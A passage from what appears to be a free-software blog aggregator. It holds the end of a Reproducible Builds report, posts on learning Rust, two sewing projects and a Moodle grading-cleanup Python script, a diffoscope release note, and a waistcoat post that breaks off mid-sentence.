<p>In addition, Alexander Couzens updated the <a href="https://openwrt.org/">OpenWrt</a> configuration in order to replace the <code class="language-plaintext highlighter-rouge">tegra</code> target with <code class="language-plaintext highlighter-rouge">mpc85xx</code> [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/b5b63be56">…</a>], Jan-Benedict Glaw updated the <a href="https://www.netbsd.org/">NetBSD</a> build script to use a separate <code class="language-plaintext highlighter-rouge">$TMPDIR</code> to mitigate out of space issues on a <a href="https://en.wikipedia.org/wiki/Tmpfs">tmpfs</a>-backed <code class="language-plaintext highlighter-rouge">/tmp</code> [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/910b83f88">…</a>] and Zheng Junjie added a link to the <a href="https://guix.gnu.org/">GNU Guix</a> tests [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/57b21155e">…</a>].</p>
<p>Lastly, node maintenance was performed by Holger Levsen [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/01ecc9495">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/2f650ed98">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/20e9e5c64">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/9ce43116c">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/9a37e768d">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/b7417a2f8">…</a>] and Vagrant Cascadian [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/a2315e19f">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/aa7579a92">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/c78087b27">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/5b9d95648">…</a>].</p>
<p><br /></p>
<h3 id="upstream-patches">Upstream patches</h3>
<p>The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:</p>
<ul>
<li>
<p>Philip Rinn:</p>
<ul>
<li><a href="https://github.com/manisandro/gImageReader/pull/667"><code class="language-plaintext highlighter-rouge">gimagereader</code></a> (date)</li>
</ul>
</li>
<li>
<p>Bernhard M. Wiedemann:</p>
<ul>
<li><a href="https://github.com/OSGeo/grass/pull/3417"><code class="language-plaintext highlighter-rouge">grass</code></a> (date-related issue)</li>
<li><a href="https://build.opensuse.org/request/show/1144993"><code class="language-plaintext highlighter-rouge">grub2</code></a> (filesystem ordering issue)</li>
<li><a href="https://build.opensuse.org/request/show/1150775"><code class="language-plaintext highlighter-rouge">latex2html</code></a> (drop a non-deterministic log)</li>
<li><a href="https://github.com/markh794/mhvtl/pull/128"><code class="language-plaintext highlighter-rouge">mhvtl</code></a> (tar)</li>
<li><a href="https://github.com/openSUSE/obs-build/issues/980"><code class="language-plaintext highlighter-rouge">obs</code></a> (build-tool issue)</li>
<li><a href="https://github.com/ollama/ollama/pull/2836"><code class="language-plaintext highlighter-rouge">ollama</code></a> (GZip embedding the modification time)</li>
<li><a href="https://github.com/mfontanini/presenterm/pull/202"><code class="language-plaintext highlighter-rouge">presenterm</code></a> (filesystem-ordering issue)</li>
<li><a href="https://bugreports.qt.io/browse/QTBUG-122722"><code class="language-plaintext highlighter-rouge">qt6-quick3d</code></a> (parallelism)</li>
</ul>
</li>
<li>
<p>Chris Lamb:</p>
<ul>
<li><a href="https://bugs.debian.org/1064506">#1064506</a> filed against <a href="https://tracker.debian.org/pkg/geophar"><code class="language-plaintext highlighter-rouge">geophar</code></a>.</li>
<li><a href="https://bugs.debian.org/1064891">#1064891</a> filed against <a href="https://tracker.debian.org/pkg/pytest-repeat"><code class="language-plaintext highlighter-rouge">pytest-repeat</code></a>.</li>
<li><a href="https://bugs.debian.org/1064892">#1064892</a> filed against <a href="https://tracker.debian.org/pkg/klepto"><code class="language-plaintext highlighter-rouge">klepto</code></a>.</li>
</ul>
</li>
<li>
<p>James Addison:</p>
<ul>
<li><a href="https://bugs.debian.org/1064519">#1064519</a> filed against <a href="https://tracker.debian.org/pkg/flask-limiter"><code class="language-plaintext highlighter-rouge">flask-limiter</code></a>.</li>
<li><a href="https://bugs.debian.org/1063542"><code class="language-plaintext highlighter-rouge">python-parsl-doc</code></a> (disable dynamic argument evaluation by Sphinx <code class="language-plaintext highlighter-rouge">autodoc</code> extension)</li>
<li><a href="https://bugs.debian.org/1064891"><code class="language-plaintext highlighter-rouge">python3-pytest-repeat</code></a> (remove <code class="language-plaintext highlighter-rouge">entry_points.txt</code> creation that varied by shell)</li>
<li><a href="https://bugs.debian.org/1064894"><code class="language-plaintext highlighter-rouge">python3-selinux</code></a> (remove packaged <code class="language-plaintext highlighter-rouge">direct_url.json</code> file that embeds build path)</li>
<li><a href="https://bugs.debian.org/1064895"><code class="language-plaintext highlighter-rouge">python3-sepolicy</code></a> (remove packaged <code class="language-plaintext highlighter-rouge">direct_url.json</code> file that embeds build path)</li>
<li><a href="https://bugs.debian.org/1064575">#1064575</a> filed against <a href="https://tracker.debian.org/pkg/pyswarms"><code class="language-plaintext highlighter-rouge">pyswarms</code></a>.</li>
<li><a href="https://bugs.debian.org/1064638">#1064638</a> filed against <a href="https://tracker.debian.org/pkg/python-x2go"><code class="language-plaintext highlighter-rouge">python-x2go</code></a>.</li>
<li><a href="https://bugs.debian.org/1064404"><code class="language-plaintext highlighter-rouge">snapd</code></a> (fix timestamp header in packaged manual-page)</li>
<li><a href="https://bugs.debian.org/1042955"><code class="language-plaintext highlighter-rouge">zzzeeksphinx</code></a> (existing RB patch forwarded and merged (with modifications))</li>
</ul>
</li>
<li>
<p>Johannes Schauer Marin Rodrigues:</p>
<ul>
<li><a href="https://bugs.debian.org/1063939">#1063939</a> filed against <a href="https://tracker.debian.org/pkg/fop"><code class="language-plaintext highlighter-rouge">fop</code></a>.</li>
</ul>
</li>
</ul>
<p><br /></p>
<hr />
<p>If you are interested in contributing to the Reproducible Builds project, please visit our <a href="https://reproducible-builds.org/contribute/"><em>Contribute</em></a> page on our website. You can also get in touch with us via:</p>
<ul>
<li>
<p>IRC: <code class="language-plaintext highlighter-rouge">#reproducible-builds</code> on <code class="language-plaintext highlighter-rouge">irc.oftc.net</code>.</p>
</li>
<li>
<p>Twitter: <a href="https://twitter.com/ReproBuilds">@ReproBuilds</a></p>
</li>
<li>
<p>Mastodon: <a href="https://fosstodon.org/@reproducible_builds">@reproducible_builds@fosstodon.org</a></p>
</li>
<li>
<p>Mailing list: <a href="https://lists.reproducible-builds.org/listinfo/rb-general"><code class="language-plaintext highlighter-rouge">rb-general@lists.reproducible-builds.org</code></a></p>
</li>
</ul>2024-03-09T16:53:13+00:00Reproducible BuildsIustin Pop: Finally learning some Rust - hello photo-backlog-exporter!
https://k1024.org/posts/2024/2024-03-09-learning-rust-finally/
<p>After 4? 5? or so years of wanting to learn Rust, over the past 4 or
so months I finally bit the bullet and found the motivation to write
some Rust, and a subject to apply it to.</p>
<p>And I was, and still am, thoroughly surprised. It’s like someone took
Haskell, simplified it to some extent, and wrote a systems language
out of it. Writing Rust after Haskell seems easy, and pleasant, and you:</p>
<ul>
<li>don’t have to care about unintended laziness which causes memory
“leaks” (stuck memory, more like).</li>
<li>don’t have to care about GC eating too much of your multi-threaded
RTS.</li>
<li>can be happy that there’s lots of activity and buzz around the language.</li>
<li>can be happy about generating very small, efficient binaries that feel
right at home on a Raspberry Pi, especially on models older than the 5.</li>
<li>are very happy that error handling is done right (Option and Result,
not like Go…)</li>
</ul>
<p>On the other hand:</p>
<ul>
<li>there are no actual monads; the <code>?</code> operator kind of looks like
being in a <code>do</code> block, but only for Option and Result,
sadly.</li>
<li>there’s no <a href="https://www.stackage.org">Stackage</a>; it’s like having
only Hackage available, and you can only hope all packages work together
well.</li>
<li>most packaging is designed to work only against upstream/online
crates.io, so offline packaging is doable but not “native” (from
what I’ve seen).</li>
</ul>
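<p>As a rough illustration of that point (an assumed example, not code from any project mentioned here), <code>?</code> gives early returns for both <code>Option</code> and <code>Result</code>:</p>

```rust
// Assumed illustration: `?` returns early with None/Err, a bit like
// Haskell's do-notation, but hard-wired to Option and Result.
fn parse_and_double(s: &str) -> Result<i64, std::num::ParseIntError> {
    let n: i64 = s.trim().parse()?; // early return on parse error
    Ok(n * 2)
}

fn first_char_upper(s: &str) -> Option<char> {
    let c = s.chars().next()?; // early return on empty input
    Some(c.to_ascii_uppercase())
}

fn main() {
    assert_eq!(parse_and_double(" 21 "), Ok(42));
    assert!(parse_and_double("nope").is_err());
    assert_eq!(first_char_upper("rust"), Some('R'));
    assert_eq!(first_char_upper(""), None);
}
```

The limitation the post complains about is visible here: the same short-circuiting pattern works for these two types, but there is no general mechanism to reuse it for an arbitrary monad.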
<p>However, overall, one can clearly see there’s more movement in Rust,
and the quality of some parts of the toolchain is better (looking at
you, rust-analyzer, compared to HLS).</p>
<p>So, with that, I’ve just tagged <a href="https://github.com/iustin/photo-backlog-exporter/releases/tag/v0.1.0">photo-backlog-exporter
v0.1.0</a>. It’s
a port of a Python script that ran as a textfile collector, which
meant updates only every ~15 minutes, since it was a bit slow to
start. I then rewrote it in Go (but I don’t like Go the language, plus the
GC: if I have to deal with a GC, I’d rather write Haskell), and
finally rewrote it in Rust.</p>
<p>What does this do? It exports metrics for Prometheus based on the
count, age and distribution of files in a directory. These files
being, for me, the pictures I still have to sort, cull and process,
because I never have enough free time to clear out the backlog. The
script is kind of designed to work together with Corydalis, but since
it doesn’t care about file content, it can also double (easily) as
a simple “file count/age exporter”.</p>
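<p>The core of such an exporter is easy to sketch in safe, stdlib-only Rust; the following is an assumed illustration of the idea (file count plus oldest-file age, the kind of gauges published to Prometheus), not actual photo-backlog-exporter code:</p>

```rust
// Assumed sketch, not the real exporter: count the files in a directory
// and find the age of the oldest one, then print them in the Prometheus
// text exposition format. Metric names here are made up for the example.
use std::fs;
use std::path::Path;
use std::time::{Duration, SystemTime};

fn backlog_stats(dir: &Path) -> std::io::Result<(usize, Duration)> {
    let mut count = 0;
    let mut oldest = Duration::ZERO;
    for entry in fs::read_dir(dir)? {
        let entry = entry?;
        if entry.file_type()?.is_file() {
            count += 1;
            // Age = now - mtime; clamp to zero if the clock went backwards.
            let age = SystemTime::now()
                .duration_since(entry.metadata()?.modified()?)
                .unwrap_or(Duration::ZERO);
            if age > oldest {
                oldest = age;
            }
        }
    }
    Ok((count, oldest))
}

fn main() -> std::io::Result<()> {
    let dir = std::env::temp_dir().join("backlog-demo");
    fs::create_dir_all(&dir)?;
    fs::write(dir.join("img1.raw"), b"x")?;
    fs::write(dir.join("img2.raw"), b"y")?;
    let (count, oldest) = backlog_stats(&dir)?;
    println!("photo_backlog_files {}", count);
    println!("photo_backlog_oldest_seconds {}", oldest.as_secs());
    Ok(())
}
```

A real exporter would additionally serve these lines over HTTP (or write them to a textfile-collector path) and bucket ages into a distribution, but the per-directory scan above is the essential computation.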
<p>And to my surprise, writing in Rust is <em>soo</em> pleasant that the
feature list has grown beyond the original Python script’s, and -
compared to that untested script - I’ve rather easily achieved a <em>very
high</em> coverage ratio. Rust has multiple types of tests, and the
combination allows getting pretty far down into the details of testing:</p>
<ul>
<li>region coverage: >80%</li>
<li>function coverage: >89% (so close here!)</li>
<li>line coverage: >95%</li>
</ul>
<p>I had to combine a (large) number of testing crates to get things
expressive enough, but it was worth the effort. The latest find, from
yesterday, <a href="https://docs.rs/crate/assert_cmd/latest"><code>assert_cmd</code></a>, is
excellent for describing tests and assertions in Rust itself, rather than
via a separate, new DSL, like the <code>shelltest</code> one I was using in Haskell.</p>
<p>To some extent, I feel like I found the missing arrow in the
quiver. Haskell is good, quite good for some types of workloads,
but of course not all, and Rust complements it very nicely, with
lots of overlap (as expected). Python can fill in any quick-and-dirty
scripting needed. And I just need to learn more frontend, specifically
Typescript (the language, not referring to any specific
libraries/frameworks), and I’ll be ready for AI to take over coding
😅…</p>
<p>So, for now, I’ll need to split my free time coding between all of the
above, and keep exercising my skills. But so glad to have found a
<em>good</em> new language!</p>2024-03-09T13:30:00+00:00Iustin PopValhalla's Things: Elastic Neck Top Two: MOAR Ruffles
https://blog.trueelena.org/blog/2024/03/09-elastic_neck_top_two_moar_ruffles/index.html
<article>
<section class="header">
Posted on March 9, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/craft%3Asewing.html" title="All pages tagged 'craft:sewing'.">craft:sewing</a>, <a href="https://blog.trueelena.org/tags/FreeSoftWear.html" title="All pages tagged 'FreeSoftWear'.">FreeSoftWear</a>
</section>
<section>
<p><img alt="A woman wearing a white top with a wide neck with ruffles and puffy sleeves that are gathered at the cuff. The top is tucked in the trousers to gather the fullness at the waist." class="align-center" src="https://blog.trueelena.org/blog/2024/03/09-elastic_neck_top_two_moar_ruffles/jeans_and_elastic_top.jpg" style="width: 80.0%;" /></p>
<p>After making my <a href="https://blog.trueelena.org/blog/2023/07/26-elastic_neck_top/index.html">Elastic Neck Top</a>
I knew I wanted to make another one less constrained by the amount of
available fabric.</p>
<p>I had a big cut of white cotton voile, I bought some more swimsuit
elastic, and I also had a spool of n°100 sewing cotton, but then I
postponed the project for a while, as I was working on other things.</p>
<p>Then FOSDEM 2024 arrived. I was going to attend it remotely, and I was working on
my <a href="https://www.scrooppatterns.com/products/augusta-stays-1775-1789">Augusta Stays</a>, but
I knew that in the middle of FOSDEM I risked getting to the stage where
I needed to leave the computer to try the stays on: not something really
compatible with the frenetic pace of a FOSDEM weekend, even one spent at
home.</p>
<p>I needed a backup project<a class="footnote-ref" href="https://blog.trueelena.org#fn1" id="fnref1"><sup>1</sup></a>, and this was perfect: I already
had everything I needed, the pattern and instructions were already on my
site (so I didn’t need to take pictures while working), and it was
mostly a lot of straight seams, perfect while watching conference
videos.</p>
<p>So, on the Friday before FOSDEM I cut all of the pieces, then spent
three quarters of FOSDEM on the stays, and when I reached the point
where I needed to stop for a fit test I started on the top.</p>
<p>Like the first one, everything was sewn by hand, and one week after I
had started everything was assembled, except for the casings for the
elastic at the neck and cuffs, which required about 10 km of sewing, and
even if it was just a running stitch it made me want to reconsider my
lifestyle choices a few times: there was really <em>no</em> reason for me not
to do just those seams by machine in a few minutes.</p>
<p>Instead I kept sewing by hand whenever I had time for it, and on the
next weekend it was ready. We had a rare day of sun during the weekend,
so I wore my thermal underwear, some other layer, a scarf around my
neck, and went outside with my SO to have a batch of pictures taken
(those in the jeans posts, and others for a post I haven’t written yet.
Have I mentioned I have a backlog?).</p>
<p>And then the top went into the wardrobe, and it will come out again when
the weather is a bit warmer. Or maybe it will be used under the
Augusta Stays, since I don’t have a 1700 chemise yet, but that requires
actually finishing them.</p>
<p><a href="https://sewing-patterns.trueelena.org/contemporary_unisex/tops/low_waste_elastic_neck_top/index.html">The pattern for this project was already online</a>,
of course, but I’ve added a picture of the casing to the relevant
section, and everything is as usual #FreeSoftWear.</p>
<section class="footnotes footnotes-end-of-document">
<hr />
<ol>
<li id="fn1"><p>yes, I could have worked on some knitting WIP, but lately
I’m more in a sewing mood.<a class="footnote-back" href="https://blog.trueelena.org#fnref1">↩︎</a></p></li>
</ol>
</section>
</section>
</article>2024-03-09T00:00:00+00:00Elena “of Valhalla”Louis-Philippe Véronneau: Acts of active procrastination: example of a silly Python script for Moodle
https://veronneau.org/acts-of-active-procrastination-example-of-a-silly-python-script-for-moodle.html
<p>My brain is currently suffering from an overload caused by grading student
assignments.</p>
<p>In search of a somewhat productive way to procrastinate, I thought I
would share a small script I wrote sometime in 2023 to facilitate my grading
work.</p>
<p>I use Moodle for all the classes I teach and students use it to hand in
their papers. When I'm ready to grade them, I download the ZIP archive Moodle
provides containing all their PDF files and annotate them <a href="https://veronneau.org/grading-using-the-wacom-intuos-s.html">using xournalpp and
my Wacom tablet</a>.</p>
<p>Once this is done, I have a directory structure that looks like this:</p>
<pre>Assignment FooBar/
├── Student A_21100_assignsubmission_file
│ ├── graded paper.pdf
│ ├── Student A's perfectly named assignment.pdf
│ └── Student A's perfectly named assignment.xopp
├── Student B_21094_assignsubmission_file
│ ├── graded paper.pdf
│ ├── Student B's perfectly named assignment.pdf
│ └── Student B's perfectly named assignment.xopp
├── Student C_21093_assignsubmission_file
│ ├── graded paper.pdf
│ ├── Student C's perfectly named assignment.pdf
│ └── Student C's perfectly named assignment.xopp
⋮
</pre>
<p>Before I can upload files back to Moodle, this directory needs to be copied (I
have to keep the original files), cleaned of everything but the <code>graded
paper.pdf</code> files and compressed in a ZIP.</p>
<p>You can see how this can quickly get tedious to do by hand. Not being a
<em>complete</em> tool, I often resorted to crafting a few spurious shell one-liners
each time I had to do this<sup id="fnref:oneliner"><a class="footnote-ref" href="https://veronneau.org/feeds/languages/en.atom.xml#fn:oneliner">1</a></sup>. Eventually I got tired of <code>ctrl-R</code>-ing my
shell history and wrote something reusable.</p>
<p>Behold this script! When I began writing this post, I was certain I had cheaped
out on my 2021 New Year's resolution and written it in Shell, but glory!, it
seems I used a proper scripting language instead.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python3</span>
<span class="c1"># Copyright (C) 2023, Louis-Philippe Véronneau <pollo@debian.org></span>
<span class="c1">#</span>
<span class="c1"># This program is free software: you can redistribute it and/or modify</span>
<span class="c1"># it under the terms of the GNU General Public License as published by</span>
<span class="c1"># the Free Software Foundation, either version 3 of the License, or</span>
<span class="c1"># (at your option) any later version.</span>
<span class="c1">#</span>
<span class="c1"># This program is distributed in the hope that it will be useful,</span>
<span class="c1"># but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<span class="c1"># MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span>
<span class="c1"># GNU General Public License for more details.</span>
<span class="c1">#</span>
<span class="c1"># You should have received a copy of the GNU General Public License</span>
<span class="c1"># along with this program. If not, see <http://www.gnu.org/licenses/>.</span>
<span class="sd">"""</span>
<span class="sd">This script aims to take a directory containing PDF files exported via the</span>
<span class="sd">Moodle mass download function, remove everything but the final files to submit</span>
<span class="sd">back to the students and zip it back.</span>
<span class="sd">usage: ./moodle-zip.py <target_dir></span>
<span class="sd">"""</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">shutil</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">tempfile</span>
<span class="kn">from</span> <span class="nn">fnmatch</span> <span class="kn">import</span> <span class="n">fnmatch</span>
<span class="k">def</span> <span class="nf">sanity</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Run sanity checks before doing anything else"""</span>
<span class="n">base_directory</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">basename</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">normpath</span><span class="p">(</span><span class="n">directory</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">isdir</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Target directory </span><span class="si">{</span><span class="n">directory</span><span class="si">}</span><span class="s2"> is not a valid directory"</span><span class="p">)</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="sa">f</span><span class="s2">"/tmp/</span><span class="si">{</span><span class="n">base_directory</span><span class="si">}</span><span class="s2">.zip"</span><span class="p">):</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Final ZIP file path '/tmp/</span><span class="si">{</span><span class="n">base_directory</span><span class="si">}</span><span class="s2">.zip' already exists"</span><span class="p">)</span>
<span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">dirnames</span><span class="p">,</span> <span class="n">_</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="k">for</span> <span class="n">dirname</span> <span class="ow">in</span> <span class="n">dirnames</span><span class="p">:</span>
<span class="n">corrige_present</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">for</span> <span class="n">file</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">dirname</span><span class="p">)):</span>
<span class="k">if</span> <span class="n">fnmatch</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="s1">'graded paper.pdf'</span><span class="p">):</span>
<span class="n">corrige_present</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="n">corrige_present</span> <span class="ow">is</span> <span class="kc">False</span><span class="p">:</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Directory </span><span class="si">{</span><span class="n">dirname</span><span class="si">}</span><span class="s2"> does not contain a 'graded paper.pdf' file"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">clean</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Remove superfluous files, to keep only the graded PDF"""</span>
<span class="k">with</span> <span class="n">tempfile</span><span class="o">.</span><span class="n">TemporaryDirectory</span><span class="p">()</span> <span class="k">as</span> <span class="n">tmp_dir</span><span class="p">:</span>
<span class="n">shutil</span><span class="o">.</span><span class="n">copytree</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">tmp_dir</span><span class="p">,</span> <span class="n">dirs_exist_ok</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">filenames</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">tmp_dir</span><span class="p">):</span>
<span class="k">for</span> <span class="n">file</span> <span class="ow">in</span> <span class="n">filenames</span><span class="p">:</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">fnmatch</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="s1">'graded paper.pdf'</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">file</span><span class="p">))</span>
<span class="n">compress</span><span class="p">(</span><span class="n">tmp_dir</span><span class="p">,</span> <span class="n">directory</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">compress</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">target_dir</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Compress directory into a ZIP file and save it to the target dir"""</span>
<span class="n">target_dir</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">basename</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">normpath</span><span class="p">(</span><span class="n">target_dir</span><span class="p">))</span>
<span class="n">shutil</span><span class="o">.</span><span class="n">make_archive</span><span class="p">(</span><span class="sa">f</span><span class="s2">"/tmp/</span><span class="si">{</span><span class="n">target_dir</span><span class="si">}</span><span class="s2">"</span><span class="p">,</span> <span class="s1">'zip'</span><span class="p">,</span> <span class="n">directory</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Final ZIP file has been saved to '/tmp/</span><span class="si">{</span><span class="n">target_dir</span><span class="si">}</span><span class="s2">.zip'"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="w"> </span><span class="sd">"""Main function"""</span>
<span class="n">target_dir</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">sanity</span><span class="p">(</span><span class="n">target_dir</span><span class="p">)</span>
<span class="n">clean</span><span class="p">(</span><span class="n">target_dir</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>
<p>If for some reason you happen to have a similar workflow to mine and end up using
this script, hit me up?</p>
<p>Now, back to grading...</p>
<div class="footnote">
<hr />
<ol>
<li id="fn:oneliner">
<p>If I recall correctly, the lazy way I used to do it involved
copying the directory, renaming the extension of the <code>graded paper.pdf</code>
files, deleting all <code>.pdf</code> and <code>.xopp</code> files using <code>find</code> and changing
<code>graded paper.foobar</code> back to a PDF. Some clever regex or learning <code>awk</code>
from the ground up could've probably done the job as well, but you know,
that would have required using my brain and <a href="https://debconf17.debconf.org/talks/92/">spending spoons</a>... <a class="footnote-backref" href="https://veronneau.org/feeds/languages/en.atom.xml#fnref:oneliner" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
</ol>
</div>2024-03-08T23:15:36+00:00Louis-Philippe VéronneauReproducible Builds (diffoscope): diffoscope 260 released
https://diffoscope.org/news/diffoscope-260-released/
<p>The diffoscope maintainers are pleased to announce the release of diffoscope
version <code class="language-plaintext highlighter-rouge">260</code>. This version includes the following changes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ Chris Lamb ]
* Actually test 7z support in the test_7z set of tests, not the lz4
functionality. (Closes: reproducible-builds/diffoscope#359)
* In addition, correctly check for the 7z binary being available
(and not lz4) when testing 7z.
* Prevent a traceback when comparing a contentful .pyc file with an
empty one. (Re: Debian:#1064973)
</code></pre></div></div>
<p>You can find out more by <a href="https://diffoscope.org">visiting the project homepage</a>.</p>2024-03-08T00:00:00+00:00Reproducible Builds (diffoscope)Valhalla's Things: Denim Waistcoat
https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/index.html
<article>
<section class="header">
Posted on March 8, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/craft%3Asewing.html" title="All pages tagged 'craft:sewing'.">craft:sewing</a>, <a href="https://blog.trueelena.org/tags/FreeSoftWear.html" title="All pages tagged 'FreeSoftWear'.">FreeSoftWear</a>
</section>
<section>
<p><img alt="A woman wearing a single breasted waistcoat with double darts at the waist, two pocket flaps at the waist and one on the left upper breast. It has four jeans buttons." class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/denim_waistcoat.jpg" style="width: 80.0%;" /></p>
<p>Having just finished sewing my jeans, I had a scant 50 cm of elastic denim
left.</p>
<p>Unrelated to that, I had just finished drafting a vest with Valentina,
after <a href="https://sewing-patterns.trueelena.org/historical_womenswear/drafting_methods/cutters/index.html#vest">the Cutters’ Practical Guide to the Cutting of Ladies Garments</a>.</p>
<p>A new pattern requires a (wearable) mockup. 50 cm of leftover fabric
require a quick project. The decision didn’t take a lot of time.</p>
<p>As a mockup, I kept things easy: single layer with no lining, some edges
finished with a topstitched hem and some with bias tape, and plain tape
on the fronts, to give more support to the buttons and buttonholes.</p>
<p>I did add pockets: not real welt ones (too much effort on denim), but
simple slits covered by flaps.</p>
<p><img alt="a rectangle of pocketing fabric on the wrong side of a denim" class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/pocket_slit.jpg" style="width: 80.0%;" /></p>
<blockquote>
<p>piece; there is a slit in the middle that has been finished with
topstitching.</p>
</blockquote>
<p>To make them I marked the slits, then I cut two rectangles of pocketing
fabric, each as wide as the slit + 1.5 cm (width of the pocket) + 3 cm
(allowances), and twice the sum of the desired pocket depth + 1 cm (space
above the slit) + 1.5 cm (allowances).</p>
<p>Then I put the rectangle on the right side of the denim, aligned so that
the top edge was 2.5 cm above the slit, sewed 2 mm from the slit, cut,
turned the pocketing to the wrong side, pressed and topstitched 2 mm
from the fold to finish the slit.</p>
<p><img alt="a piece of pocketing fabric folded in half and sewn on all 3" class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/pocket_first_seam.jpg" style="width: 80.0%;" /></p>
<blockquote>
<p>other sides; it does not lay flat on the right side of the fabric
because the finished slit (hidden in the picture) is pulling it.</p>
</blockquote>
<p>Then I turned the pocketing back to the right side, folded it in half,
sewed the side and top seams with a small allowance, pressed and turned
it again to the wrong side, where I sewed the seams again to make a
french seam.</p>
<p>And finally, a simple rectangular denim flap was topstitched to the
front, covering the slits.</p>
<p>I wasn’t as precise as I should have been and the pockets aren’t exactly
the right size, but they will do to see if I got the positions right (I
think that the breast one should be a cm or so lower, the waist ones are
fine), and of course they are tiny, but that’s to be expected from a
waistcoat.</p>
<p><img alt="The back of the waistcoat," class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/waistcoat_back.jpg" style="width: 80.0%;" /></p>
<p>The other thing that wasn’t exactly as expected is the back: the pattern
splits the bottom part of the back to give it “sufficient spring over
the hips”. The book was probably published in 1892, but I had already
found when drafting the foundation skirt that its idea of “hips”
includes a bit of structure. The “enough steel to carry a book or a cup
of tea” kind of structure. I should have expected <em>a lot</em> of spring, and
indeed that’s what I got.</p>
<p>To fit the bottom part of the back on the limited amount of fabric I had
to piece it, and I suspect that the flat felled seam in the center is
helping it stick out; I don’t think it’s exactly <em>bad</em>, but it is
